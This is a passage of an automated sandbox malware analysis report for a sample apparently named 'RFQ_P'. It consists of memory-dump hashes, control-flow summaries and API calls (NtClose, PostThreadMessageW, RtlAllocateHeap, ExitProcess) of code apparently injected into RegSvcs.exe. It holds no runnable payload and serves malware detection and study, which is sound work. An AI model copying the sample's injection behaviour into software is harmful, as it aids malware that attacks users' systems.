                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 095603fea6b507bfa209b4d99abcb27843582c4e73abe623074408616beb4295
                                                                                                              • Instruction ID: 177ed89c1b2b0d19669cfa804e6c2966b7d5476c342b904912b249c522e706b3
                                                                                                              • Opcode Fuzzy Hash: 095603fea6b507bfa209b4d99abcb27843582c4e73abe623074408616beb4295
                                                                                                              • Instruction Fuzzy Hash: 3D914074E142698FDB14DF69C990AADFBB2FF89300F24C1A9D408A7356D7309A41CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dbb1e60d71764eee6e6f6287e4758c7ebed19b185eafd1c6dbd611771eb37fdd
                                                                                                              • Instruction ID: 1bae382f1d72bbceb50dc5c1cf0e2546108cd5a358f31d725509e666e921c3b2
                                                                                                              • Opcode Fuzzy Hash: dbb1e60d71764eee6e6f6287e4758c7ebed19b185eafd1c6dbd611771eb37fdd
                                                                                                              • Instruction Fuzzy Hash: 7A71D374E156098FCB08CFA9CA805DEFBF6FB89310F24946AD415BB364D7349A42CB64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 64a1bf7ca70514caf878556b0e2de3b6f9f4ecc035a8791515e449d87117657e
                                                                                                              • Instruction ID: c77c2997451c34b9464fbcb10e3fa313940ee2eed09ac4b56a2ce3746605cbca
                                                                                                              • Opcode Fuzzy Hash: 64a1bf7ca70514caf878556b0e2de3b6f9f4ecc035a8791515e449d87117657e
                                                                                                              • Instruction Fuzzy Hash: BA513F70E102598FDB14CF69C9905ADFBF2BF89305F2481AAD818AB356DB319D41CF61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c651f913ee163625417226a2ce8f495affa18a447b6b4823576a8dd042129635
                                                                                                              • Instruction ID: 90181036b1ed3079889f7a1f9c06f25d1b57f22375b91f37b74483fa39836c89
                                                                                                              • Opcode Fuzzy Hash: c651f913ee163625417226a2ce8f495affa18a447b6b4823576a8dd042129635
                                                                                                              • Instruction Fuzzy Hash: 3A511E70E002598FDB14DFA9C9805AEFBF2BF89305F24C1AAD818A7356DB319941CF60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d9dd280b39f51e2a393a6bf8264afe06cc27c2095b1e852496e6335bcf9486f0
                                                                                                              • Instruction ID: 14edc225faff6427c58e21913fc8339046a7dc1d91279f108ac71e9934eaeb52
                                                                                                              • Opcode Fuzzy Hash: d9dd280b39f51e2a393a6bf8264afe06cc27c2095b1e852496e6335bcf9486f0
                                                                                                              • Instruction Fuzzy Hash: 2341D6B1E0521ADBCB48CFAAC5815EEFBF6AF88700F24D569C405B7214DB349A41CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0671fed7c095d17a8eabab094e0eac56cd7e7df6a32b5418ba10169d4adbf1f2
                                                                                                              • Instruction ID: 18399911dc2298ee7af93451b88b49808e21dfb161549f37b096685439cb5a69
                                                                                                              • Opcode Fuzzy Hash: 0671fed7c095d17a8eabab094e0eac56cd7e7df6a32b5418ba10169d4adbf1f2
                                                                                                              • Instruction Fuzzy Hash: 934100B0E0A60ADFCB48CFA5D5816AEFBF1EF89304F20946AC105B7664D3745741CB94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 932594a54701c3433b4dd6cc7da54cdf3942622eda8652dbabf39f2af7d40d16
                                                                                                              • Instruction ID: 65c3d47049913cc0aab0c0015e37993d0632bea74c573c7ded1cef8e445850a5
                                                                                                              • Opcode Fuzzy Hash: 932594a54701c3433b4dd6cc7da54cdf3942622eda8652dbabf39f2af7d40d16
                                                                                                              • Instruction Fuzzy Hash: 7E41D7B0E0520ADFCB48DFAAC8805EEFBF6BB88700F24C52AD415A7254D7349A45CF94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e1bbdc4264871ca1a447f9eed8a03945e47fd802ace11297e28a1b91b494c9f6
                                                                                                              • Instruction ID: dc322884b8ba1ab336e122dae88948c6fdbd9b6fec36e22b2d1333e0cadb8d2f
                                                                                                              • Opcode Fuzzy Hash: e1bbdc4264871ca1a447f9eed8a03945e47fd802ace11297e28a1b91b494c9f6
                                                                                                              • Instruction Fuzzy Hash: 2631B5B1E016188BEB18CF6AC9407AEFAF7BFC9301F14C1A9D909A6255DB305986CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a83ec5a28513c8d126143998fb4e8ee5c177129c61ccd5189d097468a150c18d
                                                                                                              • Instruction ID: 6beff8e7f6834c21c3d9c3febcc87494d8884127478d09f4975602de7e09f2a4
                                                                                                              • Opcode Fuzzy Hash: a83ec5a28513c8d126143998fb4e8ee5c177129c61ccd5189d097468a150c18d
                                                                                                              • Instruction Fuzzy Hash: 4721EA71E056589BEB18CFAB9C506DEFBF3AFC9300F08C1BAC418A6264DB3016568F11

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.5%
                                                                                                              Dynamic/Decrypted Code Coverage:3.8%
                                                                                                              Signature Coverage:6.1%
                                                                                                              Total number of Nodes:131
                                                                                                              Total number of Limit Nodes:8

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 201 42ca13-42ca4f call 404753 call 42dc33 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 39038782108515c71a78006feec956be81ea4cb259396ad082bb91abc1ea49dd
                                                                                                              • Instruction ID: db200549b6b222148207f8d6f986de2405ec562ad3a5bd5d5972b8caa0164721
                                                                                                              • Opcode Fuzzy Hash: 39038782108515c71a78006feec956be81ea4cb259396ad082bb91abc1ea49dd
                                                                                                              • Instruction Fuzzy Hash: EDE04F352402147BC520AA5ADC41F9B776CDBC5714F408419FA5867141CAB4790187A5

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 215 9607ac-9607c1 LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 211 95f9f0-95fa05 LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 212 95fae8-95fafd LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 213 95fb68-95fb7d LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 214 95fdc0-95fdd5 LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 0 414394-414396 1 414416-414425 0->1 2 414398 0->2 4 41442b-41445d call 404703 call 425193 1->4 5 414426 call 417ba3 1->5 3 41439a-41439f 2->3 3->3 7 4143a1-4143bd 3->7 11 41447d-414483 4->11 12 41445f-41446e PostThreadMessageW 4->12 5->4 7->1 12->11 13 414470-41447a 12->13 13->11
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 00255Of2$00255Of2
                                                                                                              • API String ID: 1836367815-1393866396

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 00255Of2$00255Of2
                                                                                                              • API String ID: 1836367815-1393866396

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 28 4143f3-414405 29 41440d-41445d call 42f5b3 call 417ba3 call 404703 call 425193 28->29 30 414408 call 42eba3 28->30 39 41447d-414483 29->39 40 41445f-41446e PostThreadMessageW 29->40 30->29 40->39 41 414470-41447a 40->41 41->39
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 00255Of2$00255Of2
                                                                                                              • API String ID: 1836367815-1393866396

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 42 414484-41448a 43 414436-41443b 42->43 44 41448c-414499 42->44 49 414441-41445d 43->49 50 41443c call 425193 43->50 45 41449b-41449f 44->45 47 4144a1-4144a6 45->47 48 4144bd-4144c3 45->48 47->48 51 4144a8-4144ad 47->51 48->45 52 4144c5-4144c8 48->52 53 41447d-414483 49->53 54 41445f-41446e PostThreadMessageW 49->54 50->49 51->48 55 4144af-4144b6 51->55 54->53 56 414470-41447a 54->56 57 4144c9-4144cc 55->57 58 4144b8-4144bb 55->58 56->53 58->48 58->57
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 00255Of2$00255Of2
                                                                                                              • API String ID: 1836367815-1393866396

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 191 42cd43-42cd84 call 404753 call 42dc33 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041E91E,?,?,00000000,?,0041E91E,?,?,?), ref: 0042CD7F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 196 42cd93-42cdd4 call 404753 call 42dc33 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,985BA8BF,00000007,00000000,00000004,00000000,00417425,000000F4), ref: 0042CDCF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 206 42cde3-42ce1c call 404753 call 42dc33 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNELBASE(?,00000000,00000000,?,6C50F49A,?,?,6C50F49A), ref: 0042CE17
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: [Pj
                                                                                                              • API String ID: 0-2289356113
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                              • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                              • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                              • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                              • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                                                              • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                              • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                              • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                                                              • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                              • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                              • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                              • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                              • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
